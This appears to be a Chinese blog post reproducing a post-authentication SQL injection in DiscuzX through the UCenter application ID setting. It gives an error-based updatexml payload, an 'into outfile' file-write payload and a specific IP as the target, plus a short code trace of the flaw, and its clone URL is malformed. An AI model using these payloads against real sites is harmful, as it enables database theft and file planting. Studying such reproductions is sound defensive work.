漏洞复现-DiscuzX 系列全版本后台SQL注入漏洞

目录

环境搭建

(1)源码下载:

 漏洞检测

报错注入

 写文件

漏洞分析

环境搭建

(1)源码下载:

https://search.gitee.com/?skin=rec&type=repository&q=discuz

 git clone http://htts://gite.com/ComsenzDiscuzX.git

放置于web根目录,访问即可进入安装页面

(2)也可搭建vulhub靶场,启动discuz环境

 漏洞检测

http://139.198.124.92/admin.php?

登录后台,点击站长-》UCenter设置-》UCenter应用ID,此处存在注入漏洞

报错注入

1' and (updatexml(1,concat(0x7e,(select user()),0x7e),1)); -- -

 或者使用bp抓包发送:

 写文件

1' into outfile '1.txt'; -- -

漏洞分析

 uc_client/mode/base.php:209行

 在note_exists函数中,$noteexists 变量在最后拼接了UC_APPID变量。先跟进result_first,也就是uc_client/lib/db.class.php:66行

 直接执行sql语句。所以我们只要可控前面的$noteexists变量,即可构造注入。由于Discuzx默认自带一定的敏感字符,直接的sql注入都无法攻击。通过管理员修改配置构造二次注入的方式,可以有效绕过DiscuzX自带的过滤机制。

UC_APPID是从配置文件中读取的配置信息,一般写为define('UC_APPID','xxxx');。这个是管理员可以控制的UC变量,也就是CenterID 。

参考资料

https://xz.aliyun.com/t/6927

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值